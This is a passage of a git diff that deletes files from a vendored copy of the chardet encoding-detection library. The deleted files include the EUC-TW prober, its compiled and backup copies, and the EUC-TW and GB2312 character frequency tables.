956,1552,1469,1144,2323,7837,2324,1560,2457, # 6822 -3580,3226,4005, 616,2207,3155,2180,2289,7838,1832,7839,3478,4506,7840,1319,3704, # 6838 -3705,1211,3581,1023,3227,1293,2799,7841,7842,7843,3826, 607,2306,3827, 762,2878, # 6854 -1439,4221,1360,7844,1485,3052,7845,4507,1038,4222,1450,2061,2638,4223,1379,4508, # 6870 -2585,7846,7847,4224,1352,1414,2325,2921,1172,7848,7849,3828,3829,7850,1797,1451, # 6886 -7851,7852,7853,7854,2922,4006,4007,2485,2346, 411,4008,4009,3582,3300,3101,4509, # 6902 -1561,2664,1452,4010,1375,7855,7856, 47,2959, 316,7857,1406,1591,2923,3156,7858, # 6918 -1025,2141,3102,3157, 354,2731, 884,2224,4225,2407, 508,3706, 726,3583, 996,2428, # 6934 -3584, 729,7859, 392,2191,1453,4011,4510,3707,7860,7861,2458,3585,2608,1675,2800, # 6950 - 919,2347,2960,2348,1270,4511,4012, 73,7862,7863, 647,7864,3228,2843,2255,1550, # 6966 -1346,3006,7865,1332, 883,3479,7866,7867,7868,7869,3301,2765,7870,1212, 831,1347, # 6982 -4226,4512,2326,3830,1863,3053, 720,3831,4513,4514,3832,7871,4227,7872,7873,4515, # 6998 -7874,7875,1798,4516,3708,2609,4517,3586,1645,2371,7876,7877,2924, 669,2208,2665, # 7014 -2429,7878,2879,7879,7880,1028,3229,7881,4228,2408,7882,2256,1353,7883,7884,4518, # 7030 -3158, 518,7885,4013,7886,4229,1960,7887,2142,4230,7888,7889,3007,2349,2350,3833, # 7046 - 516,1833,1454,4014,2699,4231,4519,2225,2610,1971,1129,3587,7890,2766,7891,2961, # 7062 -1422, 577,1470,3008,1524,3373,7892,7893, 432,4232,3054,3480,7894,2586,1455,2508, # 7078 -2226,1972,1175,7895,1020,2732,4015,3481,4520,7896,2733,7897,1743,1361,3055,3482, # 7094 -2639,4016,4233,4521,2290, 895, 924,4234,2170, 331,2243,3056, 166,1627,3057,1098, # 7110 -7898,1232,2880,2227,3374,4522, 657, 403,1196,2372, 542,3709,3375,1600,4235,3483, # 7126 -7899,4523,2767,3230, 576, 530,1362,7900,4524,2533,2666,3710,4017,7901, 842,3834, # 7142 -7902,2801,2031,1014,4018, 213,2700,3376, 665, 621,4236,7903,3711,2925,2430,7904, # 7158 -2431,3302,3588,3377,7905,4237,2534,4238,4525,3589,1682,4239,3484,1380,7906, 724, # 7174 -2277, 600,1670,7907,1337,1233,4526,3103,2244,7908,1621,4527,7909, 651,4240,7910, # 7190 -1612,4241,2611,7911,2844,7912,2734,2307,3058,7913, 716,2459,3059, 174,1255,2701, # 7206 -4019,3590, 548,1320,1398, 728,4020,1574,7914,1890,1197,3060,4021,7915,3061,3062, # 7222 -3712,3591,3713, 747,7916, 635,4242,4528,7917,7918,7919,4243,7920,7921,4529,7922, # 7238 -3378,4530,2432, 451,7923,3714,2535,2072,4244,2735,4245,4022,7924,1764,4531,7925, # 7254 -4246, 350,7926,2278,2390,2486,7927,4247,4023,2245,1434,4024, 488,4532, 458,4248, # 7270 -4025,3715, 771,1330,2391,3835,2568,3159,2159,2409,1553,2667,3160,4249,7928,2487, # 7286 -2881,2612,1720,2702,4250,3379,4533,7929,2536,4251,7930,3231,4252,2768,7931,2015, # 7302 -2736,7932,1155,1017,3716,3836,7933,3303,2308, 201,1864,4253,1430,7934,4026,7935, # 7318 -7936,7937,7938,7939,4254,1604,7940, 414,1865, 371,2587,4534,4535,3485,2016,3104, # 7334 -4536,1708, 960,4255, 887, 389,2171,1536,1663,1721,7941,2228,4027,2351,2926,1580, # 7350 -7942,7943,7944,1744,7945,2537,4537,4538,7946,4539,7947,2073,7948,7949,3592,3380, # 7366 -2882,4256,7950,4257,2640,3381,2802, 673,2703,2460, 709,3486,4028,3593,4258,7951, # 7382 -1148, 502, 634,7952,7953,1204,4540,3594,1575,4541,2613,3717,7954,3718,3105, 948, # 7398 -3232, 121,1745,3837,1110,7955,4259,3063,2509,3009,4029,3719,1151,1771,3838,1488, # 7414 -4030,1986,7956,2433,3487,7957,7958,2093,7959,4260,3839,1213,1407,2803, 531,2737, # 7430 -2538,3233,1011,1537,7960,2769,4261,3106,1061,7961,3720,3721,1866,2883,7962,2017, # 7446 - 120,4262,4263,2062,3595,3234,2309,3840,2668,3382,1954,4542,7963,7964,3488,1047, # 7462 -2704,1266,7965,1368,4543,2845, 649,3383,3841,2539,2738,1102,2846,2669,7966,7967, # 7478 -1999,7968,1111,3596,2962,7969,2488,3842,3597,2804,1854,3384,3722,7970,7971,3385, # 7494 -2410,2884,3304,3235,3598,7972,2569,7973,3599,2805,4031,1460, 856,7974,3600,7975, # 7510 -2885,2963,7976,2886,3843,7977,4264, 632,2510, 875,3844,1697,3845,2291,7978,7979, # 7526 -4544,3010,1239, 580,4545,4265,7980, 914, 936,2074,1190,4032,1039,2123,7981,7982, # 7542 -7983,3386,1473,7984,1354,4266,3846,7985,2172,3064,4033, 915,3305,4267,4268,3306, # 7558 -1605,1834,7986,2739, 398,3601,4269,3847,4034, 328,1912,2847,4035,3848,1331,4270, # 7574 -3011, 937,4271,7987,3602,4036,4037,3387,2160,4546,3388, 524, 742, 538,3065,1012, # 7590 -7988,7989,3849,2461,7990, 658,1103, 225,3850,7991,7992,4547,7993,4548,7994,3236, # 7606 -1243,7995,4038, 963,2246,4549,7996,2705,3603,3161,7997,7998,2588,2327,7999,4550, # 7622 -8000,8001,8002,3489,3307, 957,3389,2540,2032,1930,2927,2462, 870,2018,3604,1746, # 7638 -2770,2771,2434,2463,8003,3851,8004,3723,3107,3724,3490,3390,3725,8005,1179,3066, # 7654 -8006,3162,2373,4272,3726,2541,3163,3108,2740,4039,8007,3391,1556,2542,2292, 977, # 7670 -2887,2033,4040,1205,3392,8008,1765,3393,3164,2124,1271,1689, 714,4551,3491,8009, # 7686 -2328,3852, 533,4273,3605,2181, 617,8010,2464,3308,3492,2310,8011,8012,3165,8013, # 7702 -8014,3853,1987, 618, 427,2641,3493,3394,8015,8016,1244,1690,8017,2806,4274,4552, # 7718 -8018,3494,8019,8020,2279,1576, 473,3606,4275,3395, 972,8021,3607,8022,3067,8023, # 7734 -8024,4553,4554,8025,3727,4041,4042,8026, 153,4555, 356,8027,1891,2888,4276,2143, # 7750 - 408, 803,2352,8028,3854,8029,4277,1646,2570,2511,4556,4557,3855,8030,3856,4278, # 7766 -8031,2411,3396, 752,8032,8033,1961,2964,8034, 746,3012,2465,8035,4279,3728, 698, # 7782 -4558,1892,4280,3608,2543,4559,3609,3857,8036,3166,3397,8037,1823,1302,4043,2706, # 7798 -3858,1973,4281,8038,4282,3167, 823,1303,1288,1236,2848,3495,4044,3398, 774,3859, # 7814 -8039,1581,4560,1304,2849,3860,4561,8040,2435,2161,1083,3237,4283,4045,4284, 344, # 7830 -1173, 288,2311, 454,1683,8041,8042,1461,4562,4046,2589,8043,8044,4563, 985, 894, # 7846 -8045,3399,3168,8046,1913,2928,3729,1988,8047,2110,1974,8048,4047,8049,2571,1194, # 7862 - 425,8050,4564,3169,1245,3730,4285,8051,8052,2850,8053, 636,4565,1855,3861, 760, # 7878 -1799,8054,4286,2209,1508,4566,4048,1893,1684,2293,8055,8056,8057,4287,4288,2210, # 7894 - 479,8058,8059, 832,8060,4049,2489,8061,2965,2490,3731, 990,3109, 627,1814,2642, # 7910 -4289,1582,4290,2125,2111,3496,4567,8062, 799,4291,3170,8063,4568,2112,1737,3013, # 7926 -1018, 543, 754,4292,3309,1676,4569,4570,4050,8064,1489,8065,3497,8066,2614,2889, # 7942 -4051,8067,8068,2966,8069,8070,8071,8072,3171,4571,4572,2182,1722,8073,3238,3239, # 7958 -1842,3610,1715, 481, 365,1975,1856,8074,8075,1962,2491,4573,8076,2126,3611,3240, # 7974 - 433,1894,2063,2075,8077, 602,2741,8078,8079,8080,8081,8082,3014,1628,3400,8083, # 7990 -3172,4574,4052,2890,4575,2512,8084,2544,2772,8085,8086,8087,3310,4576,2891,8088, # 8006 -4577,8089,2851,4578,4579,1221,2967,4053,2513,8090,8091,8092,1867,1989,8093,8094, # 8022 -8095,1895,8096,8097,4580,1896,4054, 318,8098,2094,4055,4293,8099,8100, 485,8101, # 8038 - 938,3862, 553,2670, 116,8102,3863,3612,8103,3498,2671,2773,3401,3311,2807,8104, # 8054 -3613,2929,4056,1747,2930,2968,8105,8106, 207,8107,8108,2672,4581,2514,8109,3015, # 8070 - 890,3614,3864,8110,1877,3732,3402,8111,2183,2353,3403,1652,8112,8113,8114, 941, # 8086 -2294, 208,3499,4057,2019, 330,4294,3865,2892,2492,3733,4295,8115,8116,8117,8118, # 8102 -#Everything below is of no interest for detection purpose -2515,1613,4582,8119,3312,3866,2516,8120,4058,8121,1637,4059,2466,4583,3867,8122, # 8118 -2493,3016,3734,8123,8124,2192,8125,8126,2162,8127,8128,8129,8130,8131,8132,8133, # 8134 -8134,8135,8136,8137,8138,8139,8140,8141,8142,8143,8144,8145,8146,8147,8148,8149, # 8150 -8150,8151,8152,8153,8154,8155,8156,8157,8158,8159,8160,8161,8162,8163,8164,8165, # 8166 -8166,8167,8168,8169,8170,8171,8172,8173,8174,8175,8176,8177,8178,8179,8180,8181, # 8182 -8182,8183,8184,8185,8186,8187,8188,8189,8190,8191,8192,8193,8194,8195,8196,8197, # 8198 -8198,8199,8200,8201,8202,8203,8204,8205,8206,8207,8208,8209,8210,8211,8212,8213, # 8214 -8214,8215,8216,8217,8218,8219,8220,8221,8222,8223,8224,8225,8226,8227,8228,8229, # 8230 -8230,8231,8232,8233,8234,8235,8236,8237,8238,8239,8240,8241,8242,8243,8244,8245, # 8246 -8246,8247,8248,8249,8250,8251,8252,8253,8254,8255,8256,8257,8258,8259,8260,8261, # 8262 -8262,8263,8264,8265,8266,8267,8268,8269,8270,8271,8272,8273,8274,8275,8276,8277, # 8278 -8278,8279,8280,8281,8282,8283,8284,8285,8286,8287,8288,8289,8290,8291,8292,8293, # 8294 -8294,8295,8296,8297,8298,8299,8300,8301,8302,8303,8304,8305,8306,8307,8308,8309, # 8310 -8310,8311,8312,8313,8314,8315,8316,8317,8318,8319,8320,8321,8322,8323,8324,8325, # 8326 -8326,8327,8328,8329,8330,8331,8332,8333,8334,8335,8336,8337,8338,8339,8340,8341, # 8342 -8342,8343,8344,8345,8346,8347,8348,8349,8350,8351,8352,8353,8354,8355,8356,8357, # 8358 -8358,8359,8360,8361,8362,8363,8364,8365,8366,8367,8368,8369,8370,8371,8372,8373, # 8374 -8374,8375,8376,8377,8378,8379,8380,8381,8382,8383,8384,8385,8386,8387,8388,8389, # 8390 -8390,8391,8392,8393,8394,8395,8396,8397,8398,8399,8400,8401,8402,8403,8404,8405, # 8406 -8406,8407,8408,8409,8410,8411,8412,8413,8414,8415,8416,8417,8418,8419,8420,8421, # 8422 -8422,8423,8424,8425,8426,8427,8428,8429,8430,8431,8432,8433,8434,8435,8436,8437, # 8438 -8438,8439,8440,8441,8442,8443,8444,8445,8446,8447,8448,8449,8450,8451,8452,8453, # 8454 -8454,8455,8456,8457,8458,8459,8460,8461,8462,8463,8464,8465,8466,8467,8468,8469, # 8470 -8470,8471,8472,8473,8474,8475,8476,8477,8478,8479,8480,8481,8482,8483,8484,8485, # 8486 -8486,8487,8488,8489,8490,8491,8492,8493,8494,8495,8496,8497,8498,8499,8500,8501, # 8502 -8502,8503,8504,8505,8506,8507,8508,8509,8510,8511,8512,8513,8514,8515,8516,8517, # 8518 -8518,8519,8520,8521,8522,8523,8524,8525,8526,8527,8528,8529,8530,8531,8532,8533, # 8534 -8534,8535,8536,8537,8538,8539,8540,8541,8542,8543,8544,8545,8546,8547,8548,8549, # 8550 -8550,8551,8552,8553,8554,8555,8556,8557,8558,8559,8560,8561,8562,8563,8564,8565, # 8566 -8566,8567,8568,8569,8570,8571,8572,8573,8574,8575,8576,8577,8578,8579,8580,8581, # 8582 -8582,8583,8584,8585,8586,8587,8588,8589,8590,8591,8592,8593,8594,8595,8596,8597, # 8598 -8598,8599,8600,8601,8602,8603,8604,8605,8606,8607,8608,8609,8610,8611,8612,8613, # 8614 -8614,8615,8616,8617,8618,8619,8620,8621,8622,8623,8624,8625,8626,8627,8628,8629, # 8630 -8630,8631,8632,8633,8634,8635,8636,8637,8638,8639,8640,8641,8642,8643,8644,8645, # 8646 -8646,8647,8648,8649,8650,8651,8652,8653,8654,8655,8656,8657,8658,8659,8660,8661, # 8662 -8662,8663,8664,8665,8666,8667,8668,8669,8670,8671,8672,8673,8674,8675,8676,8677, # 8678 -8678,8679,8680,8681,8682,8683,8684,8685,8686,8687,8688,8689,8690,8691,8692,8693, # 8694 -8694,8695,8696,8697,8698,8699,8700,8701,8702,8703,8704,8705,8706,8707,8708,8709, # 8710 -8710,8711,8712,8713,8714,8715,8716,8717,8718,8719,8720,8721,8722,8723,8724,8725, # 8726 -8726,8727,8728,8729,8730,8731,8732,8733,8734,8735,8736,8737,8738,8739,8740,8741) # 8742 diff --git a/chardet/chardet/euctwfreq.pyc b/chardet/chardet/euctwfreq.pyc deleted file mode 100644 index e586f56..0000000 Binary files a/chardet/chardet/euctwfreq.pyc and /dev/null differ diff --git a/chardet/chardet/euctwprober.py b/chardet/chardet/euctwprober.py deleted file mode 100644 index e601adf..0000000 --- a/chardet/chardet/euctwprober.py +++ /dev/null @@ -1,41 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is mozilla.org code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 1998 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -from .mbcharsetprober import MultiByteCharSetProber -from .codingstatemachine import CodingStateMachine -from .chardistribution import EUCTWDistributionAnalysis -from .mbcssm import EUCTWSMModel - -class EUCTWProber(MultiByteCharSetProber): - def __init__(self): - MultiByteCharSetProber.__init__(self) - self._mCodingSM = CodingStateMachine(EUCTWSMModel) - self._mDistributionAnalyzer = EUCTWDistributionAnalysis() - self.reset() - - def get_charset_name(self): - return "EUC-TW" diff --git a/chardet/chardet/euctwprober.py.bak b/chardet/chardet/euctwprober.py.bak deleted file mode 100644 index b073f13..0000000 --- a/chardet/chardet/euctwprober.py.bak +++ /dev/null @@ -1,41 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is mozilla.org code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 1998 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -from mbcharsetprober import MultiByteCharSetProber -from codingstatemachine import CodingStateMachine -from chardistribution import EUCTWDistributionAnalysis -from mbcssm import EUCTWSMModel - -class EUCTWProber(MultiByteCharSetProber): - def __init__(self): - MultiByteCharSetProber.__init__(self) - self._mCodingSM = CodingStateMachine(EUCTWSMModel) - self._mDistributionAnalyzer = EUCTWDistributionAnalysis() - self.reset() - - def get_charset_name(self): - return "EUC-TW" diff --git a/chardet/chardet/euctwprober.pyc b/chardet/chardet/euctwprober.pyc deleted file mode 100644 index 41d576a..0000000 Binary files a/chardet/chardet/euctwprober.pyc and /dev/null differ diff --git a/chardet/chardet/gb2312freq.py b/chardet/chardet/gb2312freq.py deleted file mode 100644 index 7a4d5a1..0000000 --- a/chardet/chardet/gb2312freq.py +++ /dev/null @@ -1,471 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is Mozilla Communicator client code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 1998 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -# GB2312 most frequently used character table -# -# Char to FreqOrder table , from hz6763 - -# 512 --> 0.79 -- 0.79 -# 1024 --> 0.92 -- 0.13 -# 2048 --> 0.98 -- 0.06 -# 6768 --> 1.00 -- 0.02 -# -# Ideal Distribution Ratio = 0.79135/(1-0.79135) = 3.79 -# Random Distribution Ration = 512 / (3755 - 512) = 0.157 -# -# Typical Distribution Ratio about 25% of Ideal one, still much higher that RDR - -GB2312_TYPICAL_DISTRIBUTION_RATIO = 0.9 - -GB2312_TABLE_SIZE = 3760 - -GB2312CharToFreqOrder = ( \ -1671, 749,1443,2364,3924,3807,2330,3921,1704,3463,2691,1511,1515, 572,3191,2205, -2361, 224,2558, 479,1711, 963,3162, 440,4060,1905,2966,2947,3580,2647,3961,3842, -2204, 869,4207, 970,2678,5626,2944,2956,1479,4048, 514,3595, 588,1346,2820,3409, - 249,4088,1746,1873,2047,1774, 581,1813, 358,1174,3590,1014,1561,4844,2245, 670, -1636,3112, 889,1286, 953, 556,2327,3060,1290,3141, 613, 185,3477,1367, 850,3820, -1715,2428,2642,2303,2732,3041,2562,2648,3566,3946,1349, 388,3098,2091,1360,3585, - 152,1687,1539, 738,1559, 59,1232,2925,2267,1388,1249,1741,1679,2960, 151,1566, -1125,1352,4271, 924,4296, 385,3166,4459, 310,1245,2850, 70,3285,2729,3534,3575, -2398,3298,3466,1960,2265, 217,3647, 864,1909,2084,4401,2773,1010,3269,5152, 853, -3051,3121,1244,4251,1895, 364,1499,1540,2313,1180,3655,2268, 562, 715,2417,3061, - 544, 336,3768,2380,1752,4075, 950, 280,2425,4382, 183,2759,3272, 333,4297,2155, -1688,2356,1444,1039,4540, 736,1177,3349,2443,2368,2144,2225, 565, 196,1482,3406, - 927,1335,4147, 692, 878,1311,1653,3911,3622,1378,4200,1840,2969,3149,2126,1816, -2534,1546,2393,2760, 737,2494, 13, 447, 245,2747, 38,2765,2129,2589,1079, 606, - 360, 471,3755,2890, 404, 848, 699,1785,1236, 370,2221,1023,3746,2074,2026,2023, -2388,1581,2119, 812,1141,3091,2536,1519, 804,2053, 406,1596,1090, 784, 548,4414, -1806,2264,2936,1100, 343,4114,5096, 622,3358, 743,3668,1510,1626,5020,3567,2513, -3195,4115,5627,2489,2991, 24,2065,2697,1087,2719, 48,1634, 315, 68, 985,2052, - 198,2239,1347,1107,1439, 597,2366,2172, 871,3307, 919,2487,2790,1867, 236,2570, -1413,3794, 906,3365,3381,1701,1982,1818,1524,2924,1205, 616,2586,2072,2004, 575, - 253,3099, 32,1365,1182, 197,1714,2454,1201, 554,3388,3224,2748, 756,2587, 250, -2567,1507,1517,3529,1922,2761,2337,3416,1961,1677,2452,2238,3153, 615, 911,1506, -1474,2495,1265,1906,2749,3756,3280,2161, 898,2714,1759,3450,2243,2444, 563, 26, -3286,2266,3769,3344,2707,3677, 611,1402, 531,1028,2871,4548,1375, 261,2948, 835, -1190,4134, 353, 840,2684,1900,3082,1435,2109,1207,1674, 329,1872,2781,4055,2686, -2104, 608,3318,2423,2957,2768,1108,3739,3512,3271,3985,2203,1771,3520,1418,2054, -1681,1153, 225,1627,2929, 162,2050,2511,3687,1954, 124,1859,2431,1684,3032,2894, - 585,4805,3969,2869,2704,2088,2032,2095,3656,2635,4362,2209, 256, 518,2042,2105, -3777,3657, 643,2298,1148,1779, 190, 989,3544, 414, 11,2135,2063,2979,1471, 403, -3678, 126, 770,1563, 671,2499,3216,2877, 600,1179, 307,2805,4937,1268,1297,2694, - 252,4032,1448,1494,1331,1394, 127,2256, 222,1647,1035,1481,3056,1915,1048, 873, -3651, 210, 33,1608,2516, 200,1520, 415, 102, 0,3389,1287, 817, 91,3299,2940, - 836,1814, 549,2197,1396,1669,2987,3582,2297,2848,4528,1070, 687, 20,1819, 121, -1552,1364,1461,1968,2617,3540,2824,2083, 177, 948,4938,2291, 110,4549,2066, 648, -3359,1755,2110,2114,4642,4845,1693,3937,3308,1257,1869,2123, 208,1804,3159,2992, -2531,2549,3361,2418,1350,2347,2800,2568,1291,2036,2680, 72, 842,1990, 212,1233, -1154,1586, 75,2027,3410,4900,1823,1337,2710,2676, 728,2810,1522,3026,4995, 157, - 755,1050,4022, 710, 785,1936,2194,2085,1406,2777,2400, 150,1250,4049,1206, 807, -1910, 534, 529,3309,1721,1660, 274, 39,2827, 661,2670,1578, 925,3248,3815,1094, -4278,4901,4252, 41,1150,3747,2572,2227,4501,3658,4902,3813,3357,3617,2884,2258, - 887, 538,4187,3199,1294,2439,3042,2329,2343,2497,1255, 107, 543,1527, 521,3478, -3568, 194,5062, 15, 961,3870,1241,1192,2664, 66,5215,3260,2111,1295,1127,2152, -3805,4135, 901,1164,1976, 398,1278, 530,1460, 748, 904,1054,1966,1426, 53,2909, - 509, 523,2279,1534, 536,1019, 239,1685, 460,2353, 673,1065,2401,3600,4298,2272, -1272,2363, 284,1753,3679,4064,1695, 81, 815,2677,2757,2731,1386, 859, 500,4221, -2190,2566, 757,1006,2519,2068,1166,1455, 337,2654,3203,1863,1682,1914,3025,1252, -1409,1366, 847, 714,2834,2038,3209, 964,2970,1901, 885,2553,1078,1756,3049, 301, -1572,3326, 688,2130,1996,2429,1805,1648,2930,3421,2750,3652,3088, 262,1158,1254, - 389,1641,1812, 526,1719, 923,2073,1073,1902, 468, 489,4625,1140, 857,2375,3070, -3319,2863, 380, 116,1328,2693,1161,2244, 273,1212,1884,2769,3011,1775,1142, 461, -3066,1200,2147,2212, 790, 702,2695,4222,1601,1058, 434,2338,5153,3640, 67,2360, -4099,2502, 618,3472,1329, 416,1132, 830,2782,1807,2653,3211,3510,1662, 192,2124, - 296,3979,1739,1611,3684, 23, 118, 324, 446,1239,1225, 293,2520,3814,3795,2535, -3116, 17,1074, 467,2692,2201, 387,2922, 45,1326,3055,1645,3659,2817, 958, 243, -1903,2320,1339,2825,1784,3289, 356, 576, 865,2315,2381,3377,3916,1088,3122,1713, -1655, 935, 628,4689,1034,1327, 441, 800, 720, 894,1979,2183,1528,5289,2702,1071, -4046,3572,2399,1571,3281, 79, 761,1103, 327, 134, 758,1899,1371,1615, 879, 442, - 215,2605,2579, 173,2048,2485,1057,2975,3317,1097,2253,3801,4263,1403,1650,2946, - 814,4968,3487,1548,2644,1567,1285, 2, 295,2636, 97, 946,3576, 832, 141,4257, -3273, 760,3821,3521,3156,2607, 949,1024,1733,1516,1803,1920,2125,2283,2665,3180, -1501,2064,3560,2171,1592, 803,3518,1416, 732,3897,4258,1363,1362,2458, 119,1427, - 602,1525,2608,1605,1639,3175, 694,3064, 10, 465, 76,2000,4846,4208, 444,3781, -1619,3353,2206,1273,3796, 740,2483, 320,1723,2377,3660,2619,1359,1137,1762,1724, -2345,2842,1850,1862, 912, 821,1866, 612,2625,1735,2573,3369,1093, 844, 89, 937, - 930,1424,3564,2413,2972,1004,3046,3019,2011, 711,3171,1452,4178, 428, 801,1943, - 432, 445,2811, 206,4136,1472, 730, 349, 73, 397,2802,2547, 998,1637,1167, 789, - 396,3217, 154,1218, 716,1120,1780,2819,4826,1931,3334,3762,2139,1215,2627, 552, -3664,3628,3232,1405,2383,3111,1356,2652,3577,3320,3101,1703, 640,1045,1370,1246, -4996, 371,1575,2436,1621,2210, 984,4033,1734,2638, 16,4529, 663,2755,3255,1451, -3917,2257,1253,1955,2234,1263,2951, 214,1229, 617, 485, 359,1831,1969, 473,2310, - 750,2058, 165, 80,2864,2419, 361,4344,2416,2479,1134, 796,3726,1266,2943, 860, -2715, 938, 390,2734,1313,1384, 248, 202, 877,1064,2854, 522,3907, 279,1602, 297, -2357, 395,3740, 137,2075, 944,4089,2584,1267,3802, 62,1533,2285, 178, 176, 780, -2440, 201,3707, 590, 478,1560,4354,2117,1075, 30, 74,4643,4004,1635,1441,2745, - 776,2596, 238,1077,1692,1912,2844, 605, 499,1742,3947, 241,3053, 980,1749, 936, -2640,4511,2582, 515,1543,2162,5322,2892,2993, 890,2148,1924, 665,1827,3581,1032, - 968,3163, 339,1044,1896, 270, 583,1791,1720,4367,1194,3488,3669, 43,2523,1657, - 163,2167, 290,1209,1622,3378, 550, 634,2508,2510, 695,2634,2384,2512,1476,1414, - 220,1469,2341,2138,2852,3183,2900,4939,2865,3502,1211,3680, 854,3227,1299,2976, -3172, 186,2998,1459, 443,1067,3251,1495, 321,1932,3054, 909, 753,1410,1828, 436, -2441,1119,1587,3164,2186,1258, 227, 231,1425,1890,3200,3942, 247, 959, 725,5254, -2741, 577,2158,2079, 929, 120, 174, 838,2813, 591,1115, 417,2024, 40,3240,1536, -1037, 291,4151,2354, 632,1298,2406,2500,3535,1825,1846,3451, 205,1171, 345,4238, - 18,1163, 811, 685,2208,1217, 425,1312,1508,1175,4308,2552,1033, 587,1381,3059, -2984,3482, 340,1316,4023,3972, 792,3176, 519, 777,4690, 918, 933,4130,2981,3741, - 90,3360,2911,2200,5184,4550, 609,3079,2030, 272,3379,2736, 363,3881,1130,1447, - 286, 779, 357,1169,3350,3137,1630,1220,2687,2391, 747,1277,3688,2618,2682,2601, -1156,3196,5290,4034,3102,1689,3596,3128, 874, 219,2783, 798, 508,1843,2461, 269, -1658,1776,1392,1913,2983,3287,2866,2159,2372, 829,4076, 46,4253,2873,1889,1894, - 915,1834,1631,2181,2318, 298, 664,2818,3555,2735, 954,3228,3117, 527,3511,2173, - 681,2712,3033,2247,2346,3467,1652, 155,2164,3382, 113,1994, 450, 899, 494, 994, -1237,2958,1875,2336,1926,3727, 545,1577,1550, 633,3473, 204,1305,3072,2410,1956, -2471, 707,2134, 841,2195,2196,2663,3843,1026,4940, 990,3252,4997, 368,1092, 437, -3212,3258,1933,1829, 675,2977,2893, 412, 943,3723,4644,3294,3283,2230,2373,5154, -2389,2241,2661,2323,1404,2524, 593, 787, 677,3008,1275,2059, 438,2709,2609,2240, -2269,2246,1446, 36,1568,1373,3892,1574,2301,1456,3962, 693,2276,5216,2035,1143, -2720,1919,1797,1811,2763,4137,2597,1830,1699,1488,1198,2090, 424,1694, 312,3634, -3390,4179,3335,2252,1214, 561,1059,3243,2295,2561, 975,5155,2321,2751,3772, 472, -1537,3282,3398,1047,2077,2348,2878,1323,3340,3076, 690,2906, 51, 369, 170,3541, -1060,2187,2688,3670,2541,1083,1683, 928,3918, 459, 109,4427, 599,3744,4286, 143, -2101,2730,2490, 82,1588,3036,2121, 281,1860, 477,4035,1238,2812,3020,2716,3312, -1530,2188,2055,1317, 843, 636,1808,1173,3495, 649, 181,1002, 147,3641,1159,2414, -3750,2289,2795, 813,3123,2610,1136,4368, 5,3391,4541,2174, 420, 429,1728, 754, -1228,2115,2219, 347,2223,2733, 735,1518,3003,2355,3134,1764,3948,3329,1888,2424, -1001,1234,1972,3321,3363,1672,1021,1450,1584, 226, 765, 655,2526,3404,3244,2302, -3665, 731, 594,2184, 319,1576, 621, 658,2656,4299,2099,3864,1279,2071,2598,2739, - 795,3086,3699,3908,1707,2352,2402,1382,3136,2475,1465,4847,3496,3865,1085,3004, -2591,1084, 213,2287,1963,3565,2250, 822, 793,4574,3187,1772,1789,3050, 595,1484, -1959,2770,1080,2650, 456, 422,2996, 940,3322,4328,4345,3092,2742, 965,2784, 739, -4124, 952,1358,2498,2949,2565, 332,2698,2378, 660,2260,2473,4194,3856,2919, 535, -1260,2651,1208,1428,1300,1949,1303,2942, 433,2455,2450,1251,1946, 614,1269, 641, -1306,1810,2737,3078,2912, 564,2365,1419,1415,1497,4460,2367,2185,1379,3005,1307, -3218,2175,1897,3063, 682,1157,4040,4005,1712,1160,1941,1399, 394, 402,2952,1573, -1151,2986,2404, 862, 299,2033,1489,3006, 346, 171,2886,3401,1726,2932, 168,2533, - 47,2507,1030,3735,1145,3370,1395,1318,1579,3609,4560,2857,4116,1457,2529,1965, - 504,1036,2690,2988,2405, 745,5871, 849,2397,2056,3081, 863,2359,3857,2096, 99, -1397,1769,2300,4428,1643,3455,1978,1757,3718,1440, 35,4879,3742,1296,4228,2280, - 160,5063,1599,2013, 166, 520,3479,1646,3345,3012, 490,1937,1545,1264,2182,2505, -1096,1188,1369,1436,2421,1667,2792,2460,1270,2122, 727,3167,2143, 806,1706,1012, -1800,3037, 960,2218,1882, 805, 139,2456,1139,1521, 851,1052,3093,3089, 342,2039, - 744,5097,1468,1502,1585,2087, 223, 939, 326,2140,2577, 892,2481,1623,4077, 982, 